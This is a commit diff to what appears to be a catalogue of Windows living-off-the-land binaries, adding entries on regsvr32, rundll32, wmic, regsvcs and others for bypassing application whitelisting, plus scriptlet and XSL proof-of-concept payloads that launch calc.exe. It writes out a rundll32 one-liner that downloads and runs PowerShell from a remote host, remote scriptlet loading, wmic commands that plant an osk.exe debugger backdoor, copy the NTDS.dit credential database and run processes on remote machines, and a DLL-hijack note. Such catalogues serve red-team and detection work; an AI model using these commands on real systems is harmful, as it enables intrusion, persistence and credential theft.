Added some more adjustments

OSBinaries/Installutil.md

@@ -11,8 +11,8 @@ Acknowledgements:
 
 
 Code sample:
-* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)
-* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)
+* [AllTheThingsX64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
+* [AllTheThingsX32.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)[1]
 
 Resources:
 * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/       
@@ -31,7 +31,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
 ```
 
 Notes:
-
+[1]Code sample linked to Red Canary - Atomic Red Team
 
 
  

OSBinaries/Msdt.md

@@ -10,7 +10,7 @@ Acknowledgements:
 * ?
 
 Code sample:
-* [NameOfLink](Payload/NameOfPayload)
+*
 
 Resources:
 * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/    

OSBinaries/Payload/Regsvr32_calc.sct

@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+	
+		]]>
+</script>
+</registration>
+</scriptlet>

OSBinaries/Payload/Wmic_calc.xsl

@@ -0,0 +1,11 @@
+<?xml version='1.0'?>
+<stylesheet
+xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
+xmlns:user="placeholder"
+version="1.0">
+<output method="text"/>
+	<ms:script implements-prefix="user" language="JScript">
+	<![CDATA[
+	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	]]> </ms:script>
+</stylesheet>

OSBinaries/Regasm.md

@@ -3,7 +3,7 @@
 * Functions: Execute
 
 ```
-regasm.exe /U AllTheThings.dll
+regasm.exe /U AllTheThingsx64.dll
 ```
 
 Acknowledgements:
@@ -11,6 +11,7 @@ Acknowledgements:
 
 Code sample:
 * [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]     
+* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]     
 
 Resources:
 * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/

OSBinaries/Regsvcs.md

@@ -3,10 +3,29 @@
 * Functions: Execute
 
 ```
-regsvcs.exe /U regsvcs.dll
-
-regsvcs.exe regsvcs.dll
+regsvcs.exe AllTheThingsx64.dll
 ```
 
 Acknowledgements:
 * Casey Smith - @subtee
+
+Code sample:
+* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]     
+* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]     
+
+Resources:
+* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
+* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+
+Full path:
+```
+C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
+C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
+```
+
+Notes:
+[1]Code sample linked to Red Canary - Atomic Red Team

OSBinaries/Regsvr32.md

@@ -4,10 +4,32 @@
 
 ```
 regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll    
+    
+regsvr32.exe /s /u /i:file.sct scrobj.dll     
 ```
    
 Acknowledgements:
 * Casey Smith - @subtee
    
+Code sample:
+* [Regsvr32_calc.sct](Payload/Regsvr32_calc.sct)[1]
+
+Resources:
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
+* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
+
+Full path:
+```
+C:\Windows\System32\regsvr32.exe
+C:\Windows\SysWOW64\regsvr32.exe
+```
+
+Notes:
+[1]Code sample linked to Red Canary - Atomic Red Team
+
+
+ 
+
    
    

OSBinaries/Rundll32.md

@@ -3,6 +3,8 @@
 * Functions: Execute
 
 ```
+rundll32.exe AllTheThingsx64,EntryPoint    
+
 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
 
 rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
@@ -38,5 +40,26 @@ Acknowledgements:
 * Moriarty - @Moriarty_Meng
 * Adam - @hexacorn
 
+Code sample:
+* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]     
+* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]     
+
+Resources:
+* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
+* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
+* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
+* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+
+Full path:
+```
+C:\Windows\System32\rundll32.exe
+C:\Windows\SysWOW64\rundll32.exe
+```
+
+Notes:
+[1]Code sample linked to Red Canary - Atomic Red Team
+
+
+ 
     
     

OSBinaries/Runscripthelper.md

@@ -9,4 +9,22 @@ runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.tx
 Acknowledgements:
 * Matt Graeber - @mattifestation
    
+Code sample:
+*
+
+Resources:
+* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
+
+Full path:
+```
+C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe    
+C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe     
+```
+
+Notes:
+
+
+
+ 
+
    

OSBinaries/Syncappvpublishingserver.md

@@ -8,3 +8,21 @@ SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http
 
 Acknowledgements:
 * Nick Landers - @monoxgas
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/monoxgas/status/895045566090010624
+
+Full path:
+```
+C:\Windows\System32\SyncAppvPublishingServer.exe
+```
+
+Notes:
+Command injection into PowerShell
+Might have been fixed in newest version of Windows 10.
+
+
+ 

OSBinaries/Wmic.md

@@ -1,11 +1,31 @@
 ## WMIC.exe
 
-* Functions: Execute
+* Functions: Reconnaissance, Execute, Read ADS
 
 ```
 wmic process call create calc    
 
-wmic process get brief /format:"https://www.example.com/file.xsl
+wmic process call create '"c:\ads\file.txt:program.exe"'
+   
+wmic useraccount get /ALL    
+    
+wmic process get caption,executablepath,commandline     
+    
+wmic qfe get description,installedOn /format:csv    
+    
+wmic /node:"192.168.0.1" service where (caption like "%sql server (%")    
+    
+get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname"    
+    
+wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"    
+    
+wmic /NODE: "192.168.0.1" process call create "evil.exe"    
+    
+wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"    
+    
+wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"    
+     
+wmic process get brief /format:"https://www.example.com/file.xsl"    
      
 wmic os get /format:"MYXSLFILE.xsl"    
      
@@ -14,3 +34,23 @@ wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
 
 Acknowledgements:
 * Casey Smith - @subtee
+
+Code sample:
+* [Wmic_calc.xsl](Payloads/Wmic_calc.xls)   
+
+Resources:
+* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
+* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
+* https://twitter.com/subTee/status/986234811944648707
+
+Full path:
+```
+c:\windows\system32\wbem\wmic.exe
+c:\windows\sysWOW64\wbem\wmic.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Xwizard.md

@@ -3,8 +3,28 @@
 * Functions: DLL hijack
 
 ```
-xwizard.exe  (xwizard.dll in same folder)
+xwizard.exe
 ```
 
 Acknowledgements:
 * Adam - @Hexacorn
+
+Code sample:
+* 
+
+Resources:
+* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
+
+Full path:
+```
+c:\windows\system32\xwizard.exe
+c:\windows\sysWOW32\xwizard.exe
+```
+
+Notes:
+Need to copy out xwizard.exe to a user controlled folder. 
+If you add your own version of xwizard.dll it will execute when you start xwizard.exe.
+
+
+
+